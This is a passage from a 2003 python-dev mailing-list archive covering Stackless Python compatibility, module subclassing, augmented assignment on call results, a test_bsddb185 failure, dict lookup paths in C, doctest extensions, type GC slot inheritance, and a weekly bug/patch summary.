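that know nothing about Stackless keep calling ml_meth as before.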

While this is just great for me, yielding complete
source code compatibility, it is a slight drawback, since
almost all extension modules make use of the PyMethodDef
structure. Therefore, binary compatibility of Stackless
has degraded dramatically.

I'm now in some kind of dilemma:
On the one side, I'm happy with this solution (while I have
to admit that it is not too inexpensive, but well, all the
new descriptor objects are also not cheap, but just great),
on the other hand, simply replacing python22.dll is no longer
sufficient. You need to re-compile everything, which might
be a hard thing on Windows (win32 extensions, wxPython).
Sure, I would stand this, if there is no alternative, I would
have to supply a complete replacement package of everything.

Do you (does anybody) have an alternative suggestion for how
to efficiently maintain a "normal" and a "non-recursive"
version of a method without changing the PyMethodDef struct?

Alternatively, would it be reasonable to ask the Python core
developers, if they would accept to augment PyMethodDef and
PyTypeObject with an extra field (default NULL, no maintenance),
just for me and Stackless?

Many thanks for any reply - sincerely -- chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/





From pje@telecommunity.com  Sat May 17 00:48:21 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Fri, 16 May 2003 19:48:21 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: <200305161345.25415.troy@gci.net>
References: <20030516202402.30333.72761.Mailman@mail.python.org>
 <20030516202402.30333.72761.Mailman@mail.python.org>
Message-ID: <5.1.1.6.0.20030516194238.02fb2d90@telecommunity.com>

At 01:45 PM 5/16/03 -0800, Troy Melhase wrote:
> >     Jeremy> I think we decided this wasn't a pure bugfix :-).  Some poor
> >     Jeremy> soul may have code that relies on being able to subclass a
> >     Jeremy> module.
> >
> > How about at least deprecating that feature in 2.2.3 and warning about it
> > so that poor soul knows this won't be supported forever?
>
>I think I'm knocking on the poor-house door.
>
>Just last night, it occurred to me that modules could be made callable via
>subclassing.

This isn't about subclassing the module *type*, but about subclassing 
*modules*.  Subclassing a module doesn't do anything useful.  Subclassing 
the module *type* does, as you demonstrate.

Python 2.3 still allows you to subclass the module type, even though it 
does not allow you to subclass modules.

Now, if you *really* want to subclass a *module*, then you should check out 
PEAK's "module inheritance" technique that lets you define new modules in 
terms of other modules.  It's useful for certain types of AOP/SOP 
techniques.  But it's currently implemented using bytecode hacking, and is 
therefore evil.  ;)  Anyway, it doesn't rely on actually *subclassing* modules.

Speaking of bytecode hacking, it would be so much easier to implement 
"portable magic" if there were a fast, easy to use, language-defined 
intermediate representation for Python code that one could hack with.  And 
don't tell me to "use Lisp", either...  ;)



From skip@pobox.com  Sat May 17 03:52:41 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 16 May 2003 21:52:41 -0500
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <3EC5734E.30209@ocf.berkeley.edu>
References: <3EC5734E.30209@ocf.berkeley.edu>
Message-ID: <16069.41977.390568.226852@montanaro.dyndns.org>

    Brett> AssertionError: 'bsddb185' == 'bsddb185'

    Brett> DBs are not my area of expertise so I don't know how to go about
    Brett> to attempt to fix this.

I'll look into it.

Skip


From skip@pobox.com  Sat May 17 14:13:05 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sat, 17 May 2003 08:13:05 -0500
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <3EC5734E.30209@ocf.berkeley.edu>
References: <3EC5734E.30209@ocf.berkeley.edu>
Message-ID: <16070.13665.129282.617413@montanaro.dyndns.org>

Brett,

I goofed a bit in my (private) note to you yesterday.  anydbm._name isn't of
interest.  It's anydbm._defaultmod.  On my system, if I mv Lib/bsddb to
Lib/bsddb- I no longer have the bsddb package available (as you said you
didn't).  In that situation, for me, anydbm._defaultmod is the gdbm module.
All three tests succeed:

    % ./python.exe ../Lib/test/test_bsddb185.py
    test_anydbm_create (__main__.Bsddb185Tests) ... ok
    test_open_existing_hash (__main__.Bsddb185Tests) ... ok
    test_whichdb (__main__.Bsddb185Tests) ... ok

If I delete gdbm.so I get dbm as anydbm._defaultmod.  Again, success:

    % ./python.exe ../Lib/test/test_bsddb185.py
    test_anydbm_create (__main__.Bsddb185Tests) ... ok
    test_open_existing_hash (__main__.Bsddb185Tests) ... ok
    test_whichdb (__main__.Bsddb185Tests) ... ok

Delete dbm.so.  Run again.  Now dumbdbm is anydbm._defaultmod.  Run again.
Success again:

    % ./python.exe ../Lib/test/test_bsddb185.py
    test_anydbm_create (__main__.Bsddb185Tests) ... ok
    test_open_existing_hash (__main__.Bsddb185Tests) ... ok
    test_whichdb (__main__.Bsddb185Tests) ... ok

In short, I can't reproduce your error.  Can you do some more debugging to
see why your anydbm.open seems to be calling bsddb185.open?

Thx,

Skip


From jepler@unpythonic.net  Sat May 17 16:21:39 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sat, 17 May 2003 10:21:39 -0500
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <20030516142451.GI6196@localhost>
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com> <20030516142451.GI6196@localhost>
Message-ID: <20030517152137.GA25579@unpythonic.net>

I think that looking at the generated bytecode is useful.

# Running with 'python -O'
>>> def f(x): x += 1
>>> dis.dis(f)
          0 LOAD_FAST                0 (x)
          3 LOAD_CONST               1 (1)
          6 INPLACE_ADD         
          7 STORE_FAST               0 (x)    ***
         10 LOAD_CONST               0 (None)
         13 RETURN_VALUE        
>>> def g(x): x[0] += 1
>>> dis.dis(g)
          0 LOAD_GLOBAL              0 (x)
          3 LOAD_CONST               1 (0)
          6 DUP_TOPX                 2
          9 BINARY_SUBSCR       
         10 LOAD_CONST               2 (1)
         13 INPLACE_ADD         
         14 ROT_THREE           
         15 STORE_SUBSCR                      ***
         16 LOAD_CONST               0 (None)
         19 RETURN_VALUE        
>>> def h(x): x.a += 1
>>> dis.dis(h)
          0 LOAD_GLOBAL              0 (x)
          3 DUP_TOP             
          4 LOAD_ATTR                1 (a)
          7 LOAD_CONST               1 (1)
         10 INPLACE_ADD         
         11 ROT_TWO             
         12 STORE_ATTR               1 (a)    ***
         15 LOAD_CONST               0 (None)
         18 RETURN_VALUE        

In each case, there's a STORE step to the inplace statement.  In the case of the proposed
	def j(x): x() += 1
what STORE instruction would you use?

>>> [opname for opname in dis.opname if opname.startswith("STORE")]
['STORE_SLICE+0', 'STORE_SLICE+1', 'STORE_SLICE+2', 'STORE_SLICE+3',
 'STORE_SUBSCR', 'STORE_NAME', 'STORE_ATTR', 'STORE_GLOBAL', 'STORE_FAST',
 'STORE_DEREF']

If you don't want one from the list, then you're looking at substantial
changes to Python.. (and STORE_DEREF probably doesn't do anything that's
relevant to this situation, though the name sure sounds promising,
doesn't it)

Jeff


From tjreedy@udel.edu  Sat May 17 18:34:05 2003
From: tjreedy@udel.edu (Terry Reedy)
Date: Sat, 17 May 2003 13:34:05 -0400
Subject: [Python-Dev] Re: [PEP] += on return of function call result
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com> <20030516142451.GI6196@localhost>
Message-ID: <ba5rn5$qfn$1@main.gmane.org>

"Luke Kenneth Casson Leighton" <lkcl@samba-tng.org> wrote in message >
1) what is the technical, syntactical or language-specific reason why
>     I can't write an expression like  f(x) += y ?

In general, ignoring repetition of side-effects, this translates to
f(x) = f(x) + y.
Abstractly, the assignment pattern is target(s) = object(s), whereas
the above is object = object.  As some of us have tried to point out to
the cbv (call-by-value) proponents on a clp thread, targets are not
objects, so object = object is not proper Python.  The reason in-place
op syntax is possible is that syntax which defines a target on the left
instead denotes an object when on the right (of '='), so that syntax
to the left of op= does double duty.  As Jeff Epler pointed out in
his response, the compiler uses that syntax to determine the type of
target and thence the appropriate store instruction.  But function
call syntax only denotes an object and does not define a target, and
hence cannot do double duty.

The exception to all this is listob += seq, which translates to
listob.extend(seq).  So if f returns a list, f(x) += y could be
executed, but only with runtime selection of the appropriate byte code.
However, if you know that f is going to return a list, so that f(x) += y
seems sensible, you can write f(x).extend(y) directly (or
f(x).append(y) if that is what you actually want).  However, since
this does not bind the result to anything, even this is pointless
unless all f does is select from lists that you can already access
otherwise.  (Example: f(lista, listb, bool_exp).extend(y).)

Terry J. Reedy





From drifty@alum.berkeley.edu  Sat May 17 19:13:15 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sat, 17 May 2003 11:13:15 -0700
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <16070.13665.129282.617413@montanaro.dyndns.org>
References: <3EC5734E.30209@ocf.berkeley.edu> <16070.13665.129282.617413@montanaro.dyndns.org>
Message-ID: <3EC67BBB.4090003@ocf.berkeley.edu>

Skip Montanaro wrote:
> Brett,
> 
> I goofed a bit in my (private) note to you yesterday.  anydbm._name isn't of
> interest.  It's anydbm._defaultmod.  

 >>> anydbm._defaultmod
<module 'dbm' from 
'/Users/drifty/cvs_code/lib/python2.3/lib-dynload/dbm.so'>

> On my system, if I mv Lib/bsddb to
> Lib/bsddb- I no longer have the bsddb package available (as you said you
> didn't).  In that situation, for me, anydbm._defaultmod is the gdbm module.
> All three tests succeed:
> 
>     % ./python.exe ../Lib/test/test_bsddb185.py
>     test_anydbm_create (__main__.Bsddb185Tests) ... ok
>     test_open_existing_hash (__main__.Bsddb185Tests) ... ok
>     test_whichdb (__main__.Bsddb185Tests) ... ok
> 
> If I delete gdbm.so I get dbm as anydbm._defaultmod.  Again, success:
> 
>     % ./python.exe ../Lib/test/test_bsddb185.py
>     test_anydbm_create (__main__.Bsddb185Tests) ... ok
>     test_open_existing_hash (__main__.Bsddb185Tests) ... ok
>     test_whichdb (__main__.Bsddb185Tests) ... ok
> 
> Delete dbm.so.  Run again.  Now dumbdbm is anydbm._defaultmod.  Run again.
> Success again:
> 

No success for me when it is using dumbdbm:

======================================================================
ERROR: test_anydbm_create (__main__.Bsddb185Tests)
----------------------------------------------------------------------
Traceback (most recent call last):
   File "Lib/test/test_bsddb185.py", line 39, in test_anydbm_create
     os.rmdir(tmpdir)
OSError: [Errno 66] Directory not empty: '/tmp/tmpkiVKcZ'

----------------------------------------------------------------------

Looks like foo.dat and foo.dir are left behind (files used by the DB?).  I will 
fix the test again to be more aggressive about deleting files.

... done.  Just used shutil.rmtree instead of the nested 'try' 
statements that called os.unlink and os.rmdir.  Now the tests pass for 
dumbdbm.  So it seems to be dbm.so for some reason.

I will see what I can figure out or at least get as much info as I can 
that I think can help in debugging this.

-Brett



From drifty@alum.berkeley.edu  Sat May 17 19:22:00 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sat, 17 May 2003 11:22:00 -0700
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <3EC67BBB.4090003@ocf.berkeley.edu>
References: <3EC5734E.30209@ocf.berkeley.edu> <16070.13665.129282.617413@montanaro.dyndns.org> <3EC67BBB.4090003@ocf.berkeley.edu>
Message-ID: <3EC67DC8.4050809@ocf.berkeley.edu>

Brett C. wrote:

> No success for me when it is using dumbdbm:
> 
> ======================================================================
> ERROR: test_anydbm_create (__main__.Bsddb185Tests)
> ----------------------------------------------------------------------
> Traceback (most recent call last):
>   File "Lib/test/test_bsddb185.py", line 39, in test_anydbm_create
>     os.rmdir(tmpdir)
> OSError: [Errno 66] Directory not empty: '/tmp/tmpkiVKcZ'
> 
> ----------------------------------------------------------------------
> 
> Looks like foo.dat and foo.dir are left (files used by the DB?).  I will 
> fix the test again to be more agressive about deleting files.
> 
> ... done.  Just used shutil.rmtree instead of the nested 'try' 
> statements that called os.unlink and os.rmdir .  Now the tests pass for 
> dumbdbm.  So it seems to be dbm.so for some reason.
> 

But then Skip checked in, I think almost simultaneously, the exact change 
I was going to make.  And guess what?  Now the darned tests pass using dbm! 
I am going to do a completely clean compile and test again to make sure 
this is not a fluke, since the only change was ``cvs update`` for 
test_bsddb185.py and that only changed how files were deleted.

Ah, the joys of coding.

-Brett



From drifty@alum.berkeley.edu  Sat May 17 20:18:23 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sat, 17 May 2003 12:18:23 -0700
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <3EC67DC8.4050809@ocf.berkeley.edu>
References: <3EC5734E.30209@ocf.berkeley.edu> <16070.13665.129282.617413@montanaro.dyndns.org> <3EC67BBB.4090003@ocf.berkeley.edu> <3EC67DC8.4050809@ocf.berkeley.edu>
Message-ID: <3EC68AFF.3020900@ocf.berkeley.edu>

Brett C. wrote:
> 
> But then Skip checked in the exact change I was going to I think almost 
> simultaneously.  And guess what?  Now the darned tests pass using dbm! I 
> am going to do a completely clean compile and test again to make sure 
> this is not a fluke since the only change was ``cvs update`` for 
> test_bsddb185.py and that only changed how files were deleted.
> 

Well, I recompiled and the test is still passing.  The  only thing I am 
aware of that changed between the tests failing and passing was me 
changing the test to use shutil.rmtree to clean up after itself and 
renaming dbm.so and then putting its name back.  I have no idea why it 
is working now, but it is.

-Brett



From skip@pobox.com  Sat May 17 23:03:20 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sat, 17 May 2003 17:03:20 -0500
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <3EC67BBB.4090003@ocf.berkeley.edu>
References: <3EC5734E.30209@ocf.berkeley.edu>
 <16070.13665.129282.617413@montanaro.dyndns.org>
 <3EC67BBB.4090003@ocf.berkeley.edu>
Message-ID: <16070.45480.640314.144944@montanaro.dyndns.org>

    Brett> No success for me when it is using dumbdbm:

    Brett> ======================================================================
    Brett> ERROR: test_anydbm_create (__main__.Bsddb185Tests)
    Brett> ----------------------------------------------------------------------
    Brett> Traceback (most recent call last):
    Brett>    File "Lib/test/test_bsddb185.py", line 39, in test_anydbm_create
    Brett>      os.rmdir(tmpdir)
    Brett> OSError: [Errno 66] Directory not empty: '/tmp/tmpkiVKcZ'

This problem is fixed in CVS.  Have you updated?

    Brett> ... done.  Just used shutil.rmtree instead of the nested 'try'
    Brett> statements that called os.unlink and os.rmdir .  Now the tests
    Brett> pass for dumbdbm.  So it seems to be dbm.so for some reason.

This is just what I checked in.

Skip


From tim.one@comcast.net  Sun May 18 02:12:12 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 17 May 2003 21:12:12 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: <006301c31b30$da69e8e0$6401a8c0@damien>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPHEFAB.tim.one@comcast.net>

[Damien Morton]
> ...
> On the other hand, as Tim pointed out to me in a private email, there is
> so much overhead in just getting to the hashtable inner loop, going
> around that loop one time instead of two or three seems inconsequential.

For in-cache tables.  For out-of-cache tables, each trip around the loop is
deadly.  Since heavily used portions of small dicts are likely to be
in-cache no matter how they're implemented, that's what makes me dubious
about pouring lots of effort into reducing collisions for small dicts
specifically.

> ...
> There seem to be two different ways to get/set/del from a dictionary.
>
> The first is using PyDict_[Get|Set|Del]Item()
>
> The second is using the embarrassingly named dict_ass_sub() and its
> partner dict_subscript().
>
> Which of these two access methods is most likely to be used?

My guess matches Guido's:  PyDict_*, except in programs making heavy use of
explicit Python dicts.  All programs use dicts under the covers for
namespace mapping, and, e.g., instance.attr and module.attr end up calling
PyDict_GetItem() directly.  Python-level explicit dict subscripting ends up
calling dict_*, essentially because Python has no idea at compile-time
whether the x in

    x[y]

*is* a dict, so generates code that goes thru the all-purpose type-dispatch
machinery.  On the third hand, some explicit-dict slinging code seems to use

    x = somedict.get(y)

everywhere, and dict_get() doesn't call PyDict_GetItem() or
dict_subscript().
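
To make the two paths concrete, here is a small sketch using only public
C API calls (PyString_FromString is the 2.3-era spelling); assume d is
known to be a dict:

#include "Python.h"

static void
two_lookups(PyObject *d)
{
    PyObject *key, *v1, *v2;

    key = PyString_FromString("x");
    if (key == NULL)
        return;

    /* The direct route, e.g. what attribute/namespace lookups end up
       using: returns a borrowed reference, and NULL without setting an
       exception when the key is absent. */
    v1 = PyDict_GetItem(d, key);

    /* The route a Python-level d["x"] takes: generic type dispatch via
       the mapping protocol, which for a dict lands in dict_subscript();
       returns a new reference and sets KeyError when the key is absent. */
    v2 = PyObject_GetItem(d, key);
    if (v2 == NULL)
        PyErr_Clear();

    Py_XDECREF(v2);
    Py_DECREF(key);
    (void)v1;
}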



From python@rcn.com  Sun May 18 02:32:22 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sat, 17 May 2003 21:32:22 -0400
Subject: [Python-Dev] SF oddity
Message-ID: <007101c31cdd$e4423440$125ffea9@oemcomputer>

When I look at www.python.org/sf/732174, there is no Submit button on the screen.
But I see it for other docs and patches.  Is anyone else having the same issue?
Without a submit button, it is darned difficult to mark the bug as fixed and close it.

--R


From tim.one@comcast.net  Sun May 18 02:52:18 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 17 May 2003 21:52:18 -0400
Subject: [Python-Dev] SF oddity
In-Reply-To: <007101c31cdd$e4423440$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEPJEFAB.tim.one@comcast.net>

[Raymond Hettinger]
> When I look at www.python.org/sf/732174 , there is no Submit
> button on the screen.
> But I see it for other docs and patches.  Is anyone else having
> the same issue?
> Without a submit button, it is darned difficult to mark the bug
> as fixed and close it.

Look at the state of your browser's horizontal scrollbar, and scroll
waaaaaay to the right.  There's a very long line in this item's description,
and that pushes the Submit button off the edge of anything less than a
161-inch monitor <wink>.



From python@rcn.com  Sun May 18 03:01:13 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sat, 17 May 2003 22:01:13 -0400
Subject: [Python-Dev] SF oddity
References: <LNBBLJKPBEHFEDALKOLCKEPJEFAB.tim.one@comcast.net>
Message-ID: <000201c31cf2$5a08dee0$125ffea9@oemcomputer>

> [Raymond Hettinger]
> > When I look at www.python.org/sf/732174 , there is no Submit
> > button on the screen.
> > But I see it for other docs and patches.  Is anyone else having
> > the same issue?
> > Without a submit button, it is darned difficult to mark the bug
> > as fixed and close it.

[Timbot]
> Look at the state of your browser's horizontal scrollbar, and scroll
> waaaaaay to the right.  There's a very long line in this item's description,
> and that pushes the Submit button off the edge of anything less than a
> 161-inch monitor <wink>.

Hmphh!

#################################################################
#################################################################
#################################################################
#####
#####
#####
#################################################################
#################################################################
#################################################################


From skip@mojam.com  Sun May 18 13:00:26 2003
From: skip@mojam.com (Skip Montanaro)
Date: Sun, 18 May 2003 07:00:26 -0500
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200305181200.h4IC0Qa21569@manatee.mojam.com>

Bug/Patch Summary
-----------------

403 open / 3646 total bugs (-11)
141 open / 2161 total patches (+6)

New Bugs
--------

Problem With email.MIMEText Package (2003-05-12)
	http://python.org/sf/736407
allow HTMLParser error recovery (2003-05-12)
	http://python.org/sf/736428
markupbase parse_declaration cannot recognize comments (2003-05-12)
	http://python.org/sf/736659
forcing function to act like an unbound method dumps core (2003-05-13)
	http://python.org/sf/736892
CGIHTTPServer does not handle scripts in sub-dirs (2003-05-13)
	http://python.org/sf/737202
os.symlink docstring is ambiguous. (2003-05-13)
	http://python.org/sf/737291
need doc for new trace module (2003-05-14)
	http://python.org/sf/737734
Failed assert in stringobject.c (2003-05-14)
	http://python.org/sf/737947
Interpreter crash: sigfpe on Alpha (2003-05-14)
	http://python.org/sf/738066
Section 13.3: htmllib.HTMLParser constructor definition amen (2003-05-15)
	http://python.org/sf/738090
pdb doesn't find some source files (2003-05-15)
	http://python.org/sf/738154
crash error in glob.glob; directories with brackets (2003-05-15)
	http://python.org/sf/738361
csv.Sniffer docs need updating (2003-05-15)
	http://python.org/sf/738471
On Windows, os.listdir() throws incorrect exception (2003-05-15)
	http://python.org/sf/738617
urllib2 CacheFTPHandler doesn't work on multiple dirs (2003-05-16)
	http://python.org/sf/738973
array.insert and negative indices (2003-05-17)
	http://python.org/sf/739313

New Patches
-----------

Mutable PyCObject (2001-11-02)
	http://python.org/sf/477441
Improvement of cgi.parse_qsl function (2002-01-25)
	http://python.org/sf/508665
CGIHTTPServer execfile should save cwd  (2002-01-25)
	http://python.org/sf/508730
rlcompleter does not expand on [ ] (2002-04-22)
	http://python.org/sf/547176
ConfigParser.read() should return list of files read (2003-01-30)
	http://python.org/sf/677651
DESTDIR improvement (2003-05-12)
	http://python.org/sf/736413
Put DEFS back to Makefile.pre.in (2003-05-12)
	http://python.org/sf/736417
Trivial improvement to NameError message (2003-05-12)
	http://python.org/sf/736730
interpreter final destination location (2003-05-12)
	http://python.org/sf/736857
docs for interpreter final destination location  (2003-05-12)
	http://python.org/sf/736859
Port tests to unittest (Part 2) (2003-05-13)
	http://python.org/sf/736962
traceback module caches sources invalid (2003-05-13)
	http://python.org/sf/737473
minor codeop fixes (2003-05-14)
	http://python.org/sf/737999
for i in range(N) optimization (2003-05-15)
	http://python.org/sf/738094
fix for glob with directories which contain brackets (2003-05-15)
	http://python.org/sf/738389
Add use_default_colors support to curses module. (2003-05-17)
	http://python.org/sf/739124

Closed Bugs
-----------

Regular expression tests: SEGV on Mac OS (2001-04-16)
	http://python.org/sf/416526
CGIHTTPServer crashes Explorer in WinME (2001-05-31)
	http://python.org/sf/429193
MacPy21: sre "recursion limit" bug (2001-06-29)
	http://python.org/sf/437472
provide a documented serialization func (2001-10-02)
	http://python.org/sf/467384
Security review of pickle/marshal docs (2001-10-16)
	http://python.org/sf/471893
Improvement of cgi.parse_qsl function (2002-01-25)
	http://python.org/sf/508665
CGIHTTPServer execfile should save cwd (2002-01-25)
	http://python.org/sf/508730
metaclasses and 2.2 highlights (2002-02-08)
	http://python.org/sf/515137
bsddb keys corruption (2002-02-25)
	http://python.org/sf/522780
test_pyclbr: bad dependency for input (2002-03-12)
	http://python.org/sf/529135
Wrong exception from re.compile() (2002-04-18)
	http://python.org/sf/545855
regex segfault on Mac OS X (2002-04-19)
	http://python.org/sf/546059
rlcompleter does not expand on [ ] (2002-04-22)
	http://python.org/sf/547176
os.spawnv() fails with underscores (2002-06-30)
	http://python.org/sf/575770
Print line number of string if at EOF (2002-07-04)
	http://python.org/sf/577295
Build error using make VPATH feature (2002-10-22)
	http://python.org/sf/626926
Have exception arguments keep their type (2003-01-27)
	http://python.org/sf/675928
No documentation of static/dynamic python modules. (2003-03-12)
	http://python.org/sf/702157
Distutils documentation amputated (2003-04-01)
	http://python.org/sf/713722
datetime types don't work as bases (2003-04-13)
	http://python.org/sf/720908
_winreg doesn't handle NULL bytes in value names (2003-04-16)
	http://python.org/sf/722413
add timeout support in socket using modules (2003-04-17)
	http://python.org/sf/723287
Minor /Tools/Scripts/crlf.py bugs (2003-04-20)
	http://python.org/sf/724767
rexec not listed as dead (2003-04-29)
	http://python.org/sf/729817
Clarification of "pos" and "endpos" for match objects. (2003-05-04)
	http://python.org/sf/732124
telnetlib.read_until: float req'd for timeout (2003-05-08)
	http://python.org/sf/734806
cStringIO.StringIO (2003-05-09)
	http://python.org/sf/735535
libwinsound.tex is missing MessageBeep() description (2003-05-10)
	http://python.org/sf/735674

Closed Patches
--------------

xmlrpclib: Optional 'nil' support (2002-10-24)
	http://python.org/sf/628208
Remove type-check from urllib2 (2002-11-15)
	http://python.org/sf/639139
urllib2.Request's headers are case-sens. (2002-12-06)
	http://python.org/sf/649742
has_function() method for CCompiler (2003-04-07)
	http://python.org/sf/717152
DESTDIR variable patch (2003-04-09)
	http://python.org/sf/718286
socketmodule inet_ntop built when IPV6 is disabled (2003-04-30)
	http://python.org/sf/730603
make threading join() method return a value (2003-05-02)
	http://python.org/sf/731607
exit status of latex2html "ignored" (2003-05-04)
	http://python.org/sf/732143
build of html docs broken (liboptparse.tex) (2003-05-04)
	http://python.org/sf/732174
Docs for test package (2003-05-04)
	http://python.org/sf/732394
Python2.3b1 makefile improperly installs IDLE (2003-05-10)
	http://python.org/sf/735613
Python makefile may install idle in the wrong place (2003-05-10)
	http://python.org/sf/735614


From jim@zope.com  Sun May 18 19:28:55 2003
From: jim@zope.com (Jim Fulton)
Date: Sun, 18 May 2003 14:28:55 -0400
Subject: [Python-Dev] doctest extensions
Message-ID: <3EC7D0E7.9000705@zope.com>

I've written some doctest extensions to:

- Generate a unittest (pyunit) test suite from a module with doctest
   tests. Each doc string containing one or more doctest tests becomes
   a test case.

   If a test fails, an error message is included in the unittest
   output that has the module file name and the approximate line number
   of the docstring containing the failed test formatted in a way
   understood by emacs error parsing. This is important. ;)

- Debug doctest tests.  Normally, doctest tests can't be debugged
   with pdb because, while they are running, doctest has taken over
   standard output.  This tool extracts the tests in a doc string
   into a separate script and runs pdb on it.

- Extract a doctest doc string into a script file.

I think that these would be good additions to doctest and propose
to add them.

The current source can be found here:

   http://cvs.zope.org/Zope3/src/zope/testing/doctestunit.py?rev=HEAD&content-type=text/vnd.viewcvs-markup

I ended up using a slightly different (and simpler) strategy for
finding docstrings than doctest uses.  This might be an issue.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From guido@python.org  Sun May 18 20:02:55 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 18 May 2003 15:02:55 -0400
Subject: [Python-Dev] C new-style classes and GC
In-Reply-To: "Your message of Fri, 16 May 2003 15:29:54 EDT."
 <BIEJKCLHCIOIHAGOKOLHEEJJFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHEEJJFLAA.tim@zope.com>
Message-ID: <200305181902.h4IJ2ti17624@pcp02138704pcs.reston01.va.comcast.net>

> PEP 253 may be partly out of date here -- or not.  In the section on
> creating a subclassable type, it says:
> 
> """
>    The base type must do the following:
> 
>       - Add the flag value Py_TPFLAGS_BASETYPE to tp_flags.
> 
>       - Declare and use tp_new(), tp_alloc() and optional tp_init()
>         slots.
> 
>       - Declare and use tp_dealloc() and tp_free().
> 
>       - Export its object structure declaration.
> 
>       - Export a subtyping-aware type-checking macro.
> """
> 
> This doesn't leave a choice about defining tp_alloc() or tp_free() -- it
> says both are required.  For a subclassable type, I believe both must
> actually be implemented too.
> 
> For a non-subclassable type, I expect they're optional.  But if you don't
> define tp_free in that case, then I believe you must also not do the
> 
>     obj->ob_type->tp_free(obj)
> 
> business in the tp_dealloc slot (else it will segfault).

PyType_Ready() inherits tp_free from the base class, so it's optional.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun May 18 21:33:44 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 18 May 2003 16:33:44 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: "Your message of Fri, 16 May 2003 16:30:47 EDT."
 <3EC54A77.7090106@zope.com>
References: <3EC507CB.6080502@zope.com>
 <1053103323.456.71.camel@slothrop.zope.com> <3EC51B12.8070407@zope.com>
 <1053106533.453.78.camel@slothrop.zope.com> <3EC53D09.3050505@zope.com>
 <1053114159.457.117.camel@slothrop.zope.com> <3EC54A77.7090106@zope.com>
Message-ID: <200305182033.h4IKXi317732@pcp02138704pcs.reston01.va.comcast.net>

> I don't know why PyDict_New doesn't just call the dict type.
> Maybe doing things in-line like this is just an optimization.

Yes; and because PyDict_New is much older than callable type objects.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun May 18 21:39:30 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 18 May 2003 16:39:30 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: "Your message of Fri, 16 May 2003 17:37:07 EDT."
 <BIEJKCLHCIOIHAGOKOLHAEKFFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHAEKFFLAA.tim@zope.com>
Message-ID: <200305182039.h4IKdU717764@pcp02138704pcs.reston01.va.comcast.net>

> Guido, would you be agreeable to making this magic even more magical?  It
> seems to me that we can know whether the current type intends to participate
> in cyclic gc, and give it a correct default tp_free value instead if so.
> The hairier type_new() function already has this extra level of
> Py_TPFLAGS_HAVE_GC-dependent magic for dynamically created types, setting
> tp_free to PyObject_Del in one case and to PyObject_GC_Del in the other.
> PyType_Ready() can supply a wrong deallocation function by default
> ("explicit is better than implicit" has no force when talking about
> PyType_Ready() <wink>).

Yes, I think this is the right thing to do -- either only inherit
tp_free when the GC bit of the base and derived class are the same, or
-- in addition -- special case inheriting PyObject_Del and turn it
into PyObject_GC_Del when the base class adds the GC bit.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun May 18 21:42:34 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 18 May 2003 16:42:34 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: "Your message of Fri, 16 May 2003 13:45:25 -0800."
 <200305161345.25415.troy@gci.net>
References: <20030516202402.30333.72761.Mailman@mail.python.org>
 <200305161345.25415.troy@gci.net>
Message-ID: <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net>

> "Why in the world would you want callable modules you ask?"  I 
> don't have a real need, but I often see the line blurred between package, 
> module, and class.

Please don't try to blur the line between module and class.  This has
been proposed many times, and the net result IMO is always more
confusion and no more power.  This is also why in 2.3, modules are no
longer subclassable.

If you really need to have a module that has behavior beyond what a
module can offer, the officially sanctioned way is to stick an
instance of a class in sys.modules[__name__] from inside the module's
code.

(I would explain more about *why* I think it's a really bad idea, but
I'm officially on vacation.)

--Guido van Rossum (home page: http://www.python.org/~guido/)



